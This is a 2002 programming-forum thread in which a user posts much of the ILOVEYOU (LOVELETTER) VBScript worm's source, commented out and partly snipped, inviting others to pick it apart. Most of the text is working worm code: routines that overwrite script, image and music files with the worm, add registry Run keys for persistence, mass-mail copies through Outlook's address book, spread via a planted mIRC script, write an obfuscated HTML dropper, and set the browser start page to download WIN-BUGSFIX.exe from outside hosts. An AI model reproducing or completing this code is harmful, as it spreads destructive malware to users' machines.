Results 1 to 6 of 6

Thread: Pick this S-H-I-T apart...

  1. #1

    Thread Starter
    PowerPoster MidgetsBro's Avatar
    Join Date
    Oct 2000
    Location
    Apparently, Internet.com
    Posts
    3,125

    Unhappy Pick this S-H-I-T apart...

    My ex-girlfriend just got this virus, and she was kind enough to copy the code to a text file and send it to me. If anyone wants to pick this apart, have fun, and maybe figure out how to cure it so I don't have to reformat her hard drive...
    WARNING! VIRUS! DO NOT RUN!
    VB Code:
    1. 'Rem  barok -loveletter(vbe) <i hate go to school>
    2. 'Rem             by: spyder  /  [email][email protected][/email]  /  @GRAMMERSoft Group  /  Manila,Philippines
    3. 'On Error Resume Next
    4. 'Dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy, dow
    5. 'eq = ""
    6. 'ctr = 0
    7. 'Set fso = CreateObject("Scripting.FileSystemObject")
    8. 'Set file = fso.OpenTextFile(WScript.ScriptFullName, 1)
    9. 'vbscopy = file.ReadAll
    10. 'main()
    11. 'Sub main()
    12. 'On Error Resume Next
    13. 'Dim wscr, rr
    14. 'Set wscr = CreateObject("WScript.Shell")
    15. 'rr = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
    16. 'If (rr >= 1) Then
    17. 'wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
    18. 'End If
    19.  
    20. '[color=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color]
    21.  
    22. 'html()
    23. 'spreadtoemail()
    24. 'listadriv()
    25. 'End Sub
    26. 'Sub regruns()
    27. 'On Error Resume Next
    28. 'Dim num, downread
    29. 'regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
    30. 'regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
    31. 'downread = ""
    32. 'downread = regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
    33. 'If (downread = "") Then
    34. 'downread = "c:\"
    35. 'End If
    36. 'if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
    37. 'Randomize
    38. 'num = Int((4 * Rnd) + 1)
    39. 'If num = 1 Then
    40. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
    41. 'ElseIf num = 2 Then
    42. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
    43. 'ElseIf num = 3 Then
    44. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
    45. 'ElseIf num = 4 Then
    46. 'regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
    47. 'End If
    48. 'End If
    49.  
    50. '[color=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color]
    51.  
    52. 'End Sub
    53. 'Sub listadriv()
    54. 'On Error Resume Next
    55. 'Dim d, dc, s
    56. 'Set dc = fso.Drives
    57. 'For Each d In dc
    58. 'If d.DriveType = 2 Or d.DriveType = 3 Then
    59. 'folderlist(d.path&"\")
    60. 'End If
    61. 'Next
    62. 'listadriv = s
    63. 'End Sub
    Last edited by MidgetsBro; Apr 26th, 2002 at 01:30 AM.
    <removed by admin>

  2. #2

    Thread Starter
    PowerPoster MidgetsBro's Avatar
    Join Date
    Oct 2000
    Location
    Apparently, Internet.com
    Posts
    3,125
    The Rest of it...
    VB Code:
    1. 'Sub infectfiles(folderspec)
    2. 'On Error Resume Next
    3. 'Dim f, f1, fc, ext, ap, mircfname, s, bname, mp3
    4. 'Set f = fso.GetFolder(folderspec)
    5. 'Set fc = f.Files
    6. 'For Each f1 In fc
    7. 'ext = fso.GetExtensionName(f1.Path)
    8. 'ext = LCase(ext)
    9. 's = LCase(f1.Name)
    10. 'If (ext = "vbs") Or (ext = "vbe") Then
    11. 'Set ap = fso.OpenTextFile(f1.Path, 2, True)
    12. 'ap.write vbscopy
    13. 'ap.Close
    14. 'ElseIf (ext = "js") Or (ext = "jse") Or (ext = "css") Or (ext = "wsh") Or (ext = "sct") Or (ext = "hta") Then
    15. 'Set ap = fso.OpenTextFile(f1.Path, 2, True)
    16. 'ap.write vbscopy
    17. 'ap.Close
    18. 'bname = fso.GetBaseName(f1.Path)
    19. 'Set cop = fso.GetFile(f1.Path)
    20. 'cop.copy(folderspec&"\"&bname&".vbs")
    21. 'fso.DeleteFile (f1.Path)
    22. 'ElseIf (ext = "jpg") Or (ext = "jpeg") Then
    23. 'Set ap = fso.OpenTextFile(f1.Path, 2, True)
    24. 'ap.write vbscopy
    25. 'ap.Close
    26. 'Set cop = fso.GetFile(f1.Path)
    27. 'cop.copy(f1.path&".vbs")
    28. 'fso.DeleteFile (f1.Path)
    29. 'ElseIf (ext = "mp3") Or (ext = "mp2") Then
    30. 'set mp3=fso.CreateTextFile(f1.path&".vbs")
    31. 'mp3.write vbscopy
    32. 'mp3.Close
    33. 'Set att = fso.GetFile(f1.Path)
    34. 'att.Attributes = att.Attributes + 2
    35. 'End If
    36. 'If (eq <> folderspec) Then
    37. 'If (s = "mirc32.exe") Or (s = "mlink32.exe") Or (s = "mirc.ini") Or (s = "script.ini") Or (s = "mirc.hlp") Then
    38. 'set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
    39. 'scriptini.WriteLine "[script]"
    40. 'scriptini.WriteLine ";mIRC Script"
    41. 'scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will"
    42. 'scriptini.WriteLine "     corrupt... WINDOWS will affect and will not run correctly. thanks"
    43. 'scriptini.WriteLine ";"
    44. 'scriptini.WriteLine ";Khaled Mardam-Bey"
    45. 'scriptini.WriteLine ";[url]http://www.mirc.com[/url]"
    46. 'scriptini.WriteLine ";"
    47. 'scriptini.WriteLine "n0=on 1:JOIN:#:{"
    48. 'scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
    49.  
    50. '[COLOR=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color]
    51.  
    52. 'Sub regcreate(regkey, regvalue)
    53. 'Set regedit = CreateObject("WScript.Shell")
    54. 'regedit.RegWrite regkey, regvalue
    55. 'End Sub
    56. 'Function regget(value)
    57. 'Set regedit = CreateObject("WScript.Shell")
    58. 'regget = regedit.RegRead(value)
    59. 'End Function
    60. 'Function fileexist(filespec)
    61. 'On Error Resume Next
    62. 'Dim msg
    63. 'If (fso.FileExists(filespec)) Then
    64. 'msg = 0
    65. 'Else
    66. 'msg = 1
    67. 'End If
    68. 'fileexist = msg
    69. 'End Function
    70. 'Function folderexist(folderspec)
    71. 'On Error Resume Next
    72. 'Dim msg
    73. 'If (fso.GetFolderExists(folderspec)) Then
    74. 'msg = 0
    75. 'Else
    76. 'msg = 1
    77. 'End If
    78. 'fileexist = msg
    79. 'End Function
    80. 'Sub spreadtoemail()
    81. 'On Error Resume Next
    82. 'Dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad
    83. 'Set regedit = CreateObject("WScript.Shell")
    84. 'Set out = WScript.CreateObject("Outlook.Application")
    85. 'Set mapi = out.GetNameSpace("MAPI")
    86. 'For ctrlists = 1 To mapi.AddressLists.Count
    87. 'Set a = mapi.AddressLists(ctrlists)
    88. 'x = 1
    89. 'regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)
    90. 'If (regv = "") Then
    91. 'regv = 1
    92. 'End If
    93. 'If (Int(a.AddressEntries.Count) > Int(regv)) Then
    94. 'For ctrentries = 1 To a.AddressEntries.Count
    95. 'malead = a.AddressEntries(x)
    96. 'regad = ""
    97. 'regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead)
    98. 'If (regad = "") Then
    99. 'Set male = out.CreateItem(0)
    100. 'male.Recipients.Add (malead)
    101. 'male.Subject = "ILOVEYOU"
    102. 'male.Body = vbcrlf&"kindly check the attached LOVELETTER
    103.  
    104. '[color=red]CODE SNIPPED TO PREVENT ASSES FROM USING IT[/color]
    105.  
    106. 'Sub html()
    107. 'On Error Resume Next
    108. 'Dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6
    109. 'dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
    110. '"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? [email][email protected][/email] ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
    111. '"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
    112. '"<?-?HEAD><BODY ONMOUSEOUT=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
    113. '"ONKEYDOWN=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
    114. '"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
    115. '"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
    116. '"<?-?BODY><?-?HTML>"&vbcrlf& _
    117. '"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
    118. '"<!--?-??-?"&vbcrlf& _
    119. '"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
    120. '"?-??-?-->"&vbcrlf& _
    121. '"<?-?SCRIPT>"&vbcrlf& _
    122. '"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
    123. '"<!--"&vbcrlf& _
    124. '"on error resume next"&vbcrlf& _
    125. '"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
    126. '"aw=1"&vbcrlf& _
    127. '"code="
    128. 'dta2="set fso=CreateObject(@[email protected]@-@)"&vbcrlf& _
    129. '"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
    130. '"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
    131. '"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
    132. '"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
    133. '"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
    134. '"wri.write code4"&vbcrlf& _
    135. '"wri.close"&vbcrlf& _
    136. '"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
    137. '"if (err.number=424) then"&vbcrlf& _
    138. '"aw=0"&vbcrlf& _
    139. '"end if"&vbcrlf& _
    140. '"if (aw=1) then"&vbcrlf& _
    141. '"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
    142. '"window.close"&vbcrlf& _
    143. '"end if"&vbcrlf& _
    144. '"end if"&vbcrlf& _
    145. '"Set regedit = CreateObject(@[email protected]@-@)"&vbcrlf& _
    146. '"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
    147. '"?-??-?-->"&vbcrlf& _
    148. '"<?-?SCRIPT>"
    149. 'dt1 = Replace(dta1, Chr(35) & Chr(45) & Chr(35), "'")
    150. 'dt1 = Replace(dt1, Chr(64) & Chr(45) & Chr(64), """")
    151. 'dt4 = Replace(dt1, Chr(63) & Chr(45) & Chr(63), "/")
    152. 'dt5 = Replace(dt4, Chr(94) & Chr(45) & Chr(94), "\")
    153. 'dt2 = Replace(dta2, Chr(35) & Chr(45) & Chr(35), "'")
    154. 'dt2 = Replace(dt2, Chr(64) & Chr(45) & Chr(64), """")
    155. 'dt3 = Replace(dt2, Chr(63) & Chr(45) & Chr(63), "/")
    156. 'dt6 = Replace(dt3, Chr(94) & Chr(45) & Chr(94), "\")
    157. 'Set fso = CreateObject("Scripting.FileSystemObject")
    158. 'Set c = fso.OpenTextFile(WScript.ScriptFullName, 1)
    159. 'lines = Split(c.ReadAll, vbCrLf)
    160. 'l1 = UBound(lines)
    161. 'For n = 0 To UBound(lines)
    162. 'lines(n) = Replace(lines(n), "'", Chr(91) + Chr(45) + Chr(91))
    163. 'lines(n) = Replace(lines(n), """", Chr(93) + Chr(45) + Chr(93))
    164. 'lines(n) = Replace(lines(n), "\", Chr(37) + Chr(45) + Chr(37))
    165. 'If (l1 = n) Then
    166. 'lines(n) = Chr(34) + lines(n) + Chr(34)
    167. 'Else
    168. 'lines(n) = Chr(34) + lines(n) + Chr(34) & "&vbcrlf& _"
    169. 'End If
    170. 'Next
    171. 'Set b = fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM")
    172. 'b.Close
    173. 'Set d = fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM", 2)
    174. 'd.write dt5
    175. 'd.write Join(lines, vbCrLf)
    176. 'd.write vbCrLf
    177. 'd.write dt6
    178. 'd.Close
    179. 'End Sub
    Last edited by MidgetsBro; Apr 26th, 2002 at 01:29 AM.
    <removed by admin>

  3. #3
    I'm about to be a PowerPoster! mendhak's Avatar
    Join Date
    Feb 2002
    Location
    Ulaan Baator GooGoo: Frog
    Posts
    38,170
    NORTON ANTIVIRUS
    soz... Just had to do that.

  4. #4

    Thread Starter
    PowerPoster MidgetsBro's Avatar
    Join Date
    Oct 2000
    Location
    Apparently, Internet.com
    Posts
    3,125
    She has Norton, but they won't let her update her definitions until she pays for the service, which she is not about to do. I personally would rather spend an hour or so reformatting than pay for any type of antivirus software. I told her to get AVG, but she can't figure it out... lol. She's not too bright in the computer department. I think this is the ILOVEYOU virus, and my norton picked it up when she tried to send it to me... it's pretty much too bad for her, I just thought someone would like to see the virus to see how these dumbass people do it. You've got to be retarded to make a virus like this...

    PS... I'm gonna edit my other posts so that no one has the full virus code...
    <removed by admin>

  5. #5
    I'm about to be a PowerPoster! mendhak's Avatar
    Join Date
    Feb 2002
    Location
    Ulaan Baator GooGoo: Frog
    Posts
    38,170
    Too late. I got this one too
    Now I have the code for 4 Pretty small, but it's a collection nevertheless.

    Good thing ur editing it. U might've been modded.

  6. #6

    Thread Starter
    PowerPoster MidgetsBro's Avatar
    Join Date
    Oct 2000
    Location
    Apparently, Internet.com
    Posts
    3,125
    Originally posted by mendhak


    Good thing ur editing it. U might've been modded.
    Exactly what I was thinking. Plus, I don't want some more *******s deciding they want to send the virus to more people, and copying the code and just sending it out.
    <removed by admin>

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width